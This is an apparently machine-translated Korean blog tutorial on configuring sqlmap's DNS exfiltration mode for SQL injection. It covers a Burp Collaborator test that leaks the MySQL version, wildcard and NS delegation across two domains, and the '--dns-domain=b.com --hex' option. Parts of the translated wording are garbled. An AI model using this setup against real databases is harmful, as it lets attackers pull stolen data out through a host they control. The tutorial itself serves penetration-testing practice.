sqlmap _dns 주입 구성 방법은 무엇입니까?

인터넷에 DNS 삽입에 대한 sqlmap 관련 기사가 너무 적습니다. --dns-domain 매개변수를 간략하게 소개할 뿐입니다. 관련 실무 기사가 모호하거나 한 획으로 언급되어 혼란스럽습니다(주로 부정직한 것이 핵심입니다.) 아직 가져갈 상사가 없습니다). 그러다가 인터넷에 있는 방법들을 참고해서 다시 해봤습니다.

준비해야 할 것은 sqlmap, windows blindjection, 도메인 이름 1~2개, 외부 네트워크 서버 입니다.

한번은 뭔가를 하다가 타임블라인드 주입을 우연히 발견했는데, 마침 윈도우 머신이었는데, DNS 주입 방법이 생각나더군요.

시작하기 전에 sqlmap의 --sql-shell 명령을 사용하여 dns 주입 페이로드를 테스트할 예정입니다

먼저 burpsuite의 Collaborator 클라이언트에서 burp가 정리한 도메인 이름을 복사해두세요

사용 sqlmap을 사용하여 sql 문을 실행

Sqlmap이 계속 실행되는 동안 burpsuite에서 요청이 수신되었습니다.

352E362E3134.9hreqpopru1xgf9skq473yo14sajy8.burpcollaborator.net.

352E362E3134 in 은 version()을 실행한 후 반환된 결과입니다.

디코딩하여 mysql 버전을 받으세요. 글쎄, 이 시점에서는 DNS 주입에 아무런 문제가 없습니다.

두 개의 도메인 이름을 구성하도록 준비하세요. 인터넷의 일부 기사에서는 하나가 괜찮다고 하지만 항상 더 번거롭게 느껴지는 경우가 많습니다. 많은 도메인 이름 서버 제공업체에서는 특정 고급 기능을 제공하지 않으므로 두 개를 준비하는 것이 더 쉽습니다.

www.a.com

www.b.com

먼저 도메인 이름 a-> a.com

*을 추가하여 팬 해상도를 수행하고 외부 IP를 가리킵니다. 네트워크 서버.

이제 도메인 이름 b->b.com을 구성해 보겠습니다.

이것은 훨씬 더 간단합니다. 도메인 이름의 DNS를 직접 수정하고 ns1.a.com ns2.a.com 등을 입력하면 됩니다. 다른 것들은 할 필요 없이 그냥 작성하면 됩니다.

그런 다음 도메인 이름이 적용될 때까지 기다리세요. 파싱이 성공했는지 테스트하기 위해 외부 네트워크 서버로 이동합니다. 그런 다음 로컬 시스템이 hello.b.com을 핑하고 이를 외부 네트워크 서버로 보냅니다. hello.b.com 요청을 이미 수신할 수 있으며 시스템에서 호스트를 찾을 수 없다는 메시지가 표시됩니다. 구문 분석을 설정하지 않았으므로 걱정하지 마세요. 이제 모든 것이 구성되었으므로 DNS 주입을 위해 sqlmap을 사용할 수 있습니다.

Sqlmap

에 --dns-domain=b.com --hex 매개변수만 추가하면 됩니다. 이 단계에서 sqlmap이 멈추고 DNS 서버 인스턴스를 설정하라는 메시지가 표시됩니다.

직접 Ctrl+ c

DNS 채널을 통한 데이터 검색이 성공했다는 메시지를 표시합니다.

사출 속도는 에러 리포팅과 유니온만큼 빠르며, 더 이상 느린 속도를 참을 필요가 없습니다.

위 내용은 sqlmap _dns 주입 구성 방법은 무엇입니까?의 상세 내용입니다. 자세한 내용은 PHP 중국어 웹사이트의 기타 관련 기사를 참조하세요!